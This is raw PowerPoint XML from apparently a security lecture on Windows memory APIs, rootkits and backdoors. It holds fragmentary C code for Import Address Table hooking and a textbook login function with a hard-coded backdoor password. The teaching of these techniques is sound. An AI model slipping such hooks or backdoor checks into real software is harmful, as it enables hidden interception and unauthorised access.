          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="2486"/>
              <a:ext cx="9265" cy="3323"/>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719"/>
              <a:ext cx="8847" cy="2858"/>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a module handle for the specified module. The module must have been loaded by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MEMORY_BASIC_INFORMATION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6231890" y="2952750"/>
            <a:ext cx="5810885" cy="3211830"/>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BaseAddress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the region of pages.</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AllocationBase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a range of pages allocated by the VirtualAlloc function.</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RegionSize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region beginning at the base address in which all pages have identical attributes, in bytes.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898515" cy="483108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000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _MEMORY_BASIC_INFORMATION {</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BaseAddress;</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AllocationBase;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AllocationProtect;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WORD   PartitionId;</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SIZE_T RegionSize;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State;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Type;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MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;</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309995" y="1170940"/>
            <a:ext cx="5744845" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
            <a:chExt cx="9047"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Contains information about a range of pages in the virtual address space of a process. </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VirtualQuery</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95885" y="4112260"/>
            <a:ext cx="12000865" cy="216344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optional] lpAddress</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base address of the region of pages to be queried.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[out] lpBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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a MEMORY_BASIC_INFORMATION structure in which information about the specified page range is returned.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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[in] dwLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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The size of the buffer pointed to by the lpBuffer parameter, in bytes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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267970" y="1373188"/>
            <a:ext cx="7151370" cy="2460625"/>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200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SIZE_T VirtualQuery(</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optional] LPCVOID                   lpAddress,</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[out]          PMEMORY_BASIC_INFORMATION lpBuffer,</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SIZE_T                    dwLength</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7533005" y="1400810"/>
            <a:ext cx="4563110" cy="2405380"/>
            <a:chOff x="11863" y="1812"/>
            <a:chExt cx="7186" cy="3788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11863" y="1812"/>
              <a:ext cx="7187" cy="3788"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6325"/>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863" y="1938"/>
              <a:ext cx="7187" cy="3536"/>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a range of pages in the virtual address space of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VirtualProtect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010660"/>
            <a:ext cx="11655425" cy="2370455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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lpAddress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address of the starting page of the region of pages whose access protection attributes are to be changed.</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dwSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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region whose access protection attributes are to be changed, in bytes.</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[in] flNewProtect</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The memory protection option.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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[out] lpflOldProtect</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pointer to a variable that receives the previous access protection value of the first page in the specified region of pages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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975360" y="1235075"/>
            <a:ext cx="4204970" cy="2526665"/>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400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>BOOL VirtualProtect(</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[in]  LPVOID lpAddress,</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[in]  SIZE_T dwSize,</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[in]  DWORD  flNewProtect,</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[out] PDWORD lpflOldProtect</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4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5492115" y="1443355"/>
            <a:ext cx="5883275" cy="2110105"/>
            <a:chOff x="9697" y="2486"/>
            <a:chExt cx="9265" cy="3323"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="2486"/>
              <a:ext cx="9265" cy="3323"/>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719"/>
              <a:ext cx="8847" cy="2858"/>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Changes the protection on a region of committed pages in the virtual address space of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Hook-Indirect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65418" y="1031240"/>
            <a:ext cx="11861165" cy="11091545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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Function to hook functions in the IAT of a specified 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lpModuleName : name of the module wich contains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lpTargetModuleName : name of the module you want to target.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 LPCSTR lpTargetModuleName)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a module handle for the specified module. The module must have been loaded by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HANDLE hModule = GetModuleHandleA(lpTargetModuleName); </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lpImageDOSHeader-&gt;e_lfanew);//heading to NT header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the IMPORT Directory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ImportDataDirectory.VirtualAddress);//obtain the virtual address of Import table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functions</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(source dll) used by the target lpTargetModuleName (target dll).</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  //go to next imported dll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(lpImageOrgThunkData-&gt;u1.AddressOfData != 0)//looking for the hooked function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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//if found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a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//change the memory for the function to be writtable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 //replace the function with ours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a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//successful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 0.0272222 L 0.00505208 -0.808796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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82550" y="967740"/>
            <a:ext cx="12027535" cy="10652125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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Function to hook functions in the IAT of a the main module of the process.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lpModuleName : name of the module wich contains the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LPVOID hModule = GetCurrentProcessModule(); //Retrieves a pseudo handle for the current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lpImageDOSHeader-&gt;e_lfanew);//Go to NT header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IMPORT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 //obtain the virtual address for the Import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functions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(lpImageOrgThunkData-&gt;u1.AddressOfData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lpImageOrgThunkData-&gt;u1.AddressOfData);//Import name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0)//if the function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 //Retrieves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 //change the memory for the function to be writtable</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(DWORD_PTR)lpFunction;//replace the function with ours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&amp;dwJunk))//successful</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748981 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0"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5"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634683" y="2271395"/>
            <a:ext cx="10922635" cy="3810000"/>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Stealth behavior:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can hide their presence on a system, making it difficult to detect and remove them.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Rootkits can steal sensitive information such as passwords, credit card numbers, and other personal information.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System modification:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can modify system files and settings, compromising the security and stability of the system.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Spreading of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can also spread other forms of malware, such as viruses and Trojans, to other systems on a network.</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The presence of a rootkit can slow down the performance of a system and consume valuable system resources.</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3"/>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38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Rootkits can cause a number of significant damages to a computer system or network:</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3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>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Rootkits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Backdoor</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Backdoor</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a:off x="754380" y="1788795"/>
            <a:ext cx="10683240" cy="3394710"/>
            <a:chOff x="1188" y="2137"/>
            <a:chExt cx="16824" cy="5346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1452" y="2352"/>
              <a:ext cx="16560" cy="5131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEF8F6"/>
            </a:solidFill>
            <a:ln w="1905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4" name="任意多边形 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1719" y="2310"/>
              <a:ext cx="15922" cy="4885"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3770"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY1" fmla="*/ 3770 h 3770"/>
                <a:gd name="connsiteX2" fmla="*/ 7740 w 7740"/>
                <a:gd name="connsiteY2" fmla="*/ 3770 h 3770"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7740" h="3770">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7740" y="3770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="FEBF7A"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>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 name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1334" y="2137"/>
              <a:ext cx="751" cy="629"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FED65A"/>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8" name="任意多边形 7"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1188" y="2481"/>
              <a:ext cx="1042" cy="38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44" h="421">
                  <a:moveTo>
                    <a:pt x="460" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="0"/>
                    <a:pt x="530" y="17"/>
                    <a:pt x="552" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="553" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="16"/>
                    <a:pt x="616" y="0"/>
                    <a:pt x="655" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="708" y="0"/>
                    <a:pt x="754" y="30"/>
                    <a:pt x="778" y="73"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="779" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="799" y="69"/>
                    <a:pt x="811" y="67"/>
                    <a:pt x="824" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890" y="67"/>
                    <a:pt x="944" y="121"/>
                    <a:pt x="944" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="944" y="254"/>
                    <a:pt x="890" y="308"/>
                    <a:pt x="824" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="308"/>
                    <a:pt x="796" y="306"/>
                    <a:pt x="783" y="301"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="773" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772" y="300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="344"/>
                    <a:pt x="710" y="374"/>
                    <a:pt x="661" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="623" y="374"/>
                    <a:pt x="590" y="357"/>
                    <a:pt x="568" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="562" y="322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558" y="328"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="367"/>
                    <a:pt x="490" y="393"/>
                    <a:pt x="440" y="393"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="397" y="393"/>
                    <a:pt x="358" y="373"/>
                    <a:pt x="332" y="342"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="332" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="345"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="390"/>
                    <a:pt x="269" y="421"/>
                    <a:pt x="219" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="421"/>
                    <a:pt x="98" y="367"/>
                    <a:pt x="98" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="292"/>
                    <a:pt x="99" y="284"/>
                    <a:pt x="100" y="276"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="103" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="253"/>
                    <a:pt x="0" y="205"/>
                    <a:pt x="0" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="80"/>
                    <a:pt x="54" y="26"/>
                    <a:pt x="121" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="26"/>
                    <a:pt x="206" y="51"/>
                    <a:pt x="226" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="88"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="75"/>
                    <a:pt x="277" y="67"/>
                    <a:pt x="302" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="67"/>
                    <a:pt x="326" y="69"/>
                    <a:pt x="337" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="348" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="74"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="30"/>
                    <a:pt x="410" y="0"/>
                    <a:pt x="460" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>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nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16227" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="任意多边形 9"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>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39" name="任意多边形 38"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>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1" name="组合 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="17333" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="任意多边形 41"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>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3" name="任意多边形 42"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>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4" name="组合 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16780" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="任意多边形 44"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>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7" name="任意多边形 46"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="220" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313437387d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1719" y="3352"/>
              <a:ext cx="16292"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457200" indent="-457200">
                <a:lnSpc>
                  <a:spcPts val="4000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>A backdoor is a hidden means of accessing a computer system or encrypted data that bypasses normal authentication and security measures. It can be </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>intentionally added by manufacturers or attackers for malicious purposes.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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Example</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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888365" y="962025"/>
            <a:ext cx="5386070" cy="5492750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="07A7AF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>char *sneaky = "SOSNEAKY";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authenticate(char *username, char *password)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char stored_pw[9];</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stored_pw[8] =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int pwfile;</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 evil back d00r</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>if (strcmp(password, sneaky) == 0) return 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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pwfile = open(username, O_RDONLY);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read(pwfile, stored_pw, 8);</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if (strcmp(password, stored_pw) == 0) return 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return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accepted()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printf("Welcome to the admin console, trusted user!\n");</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rejected()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printf("Go away!");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exit(1);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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854190" y="1123315"/>
            <a:ext cx="4450715" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int main(int argc, char **argv)</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username[9];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password[9];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int authed;</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username[8] = 0;</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password[8] = 0;</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printf("Username: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username,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printf("Password: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password,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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>authed = authenticate(username, password);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (authed) accepted();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else rejected();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Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313534347d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="15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Backdoors can cause significant damage to a system and its users. Some of the potential consequences of a backdoor include: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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475933" y="2271395"/>
            <a:ext cx="11240135" cy="3476625"/>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Security compromise:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
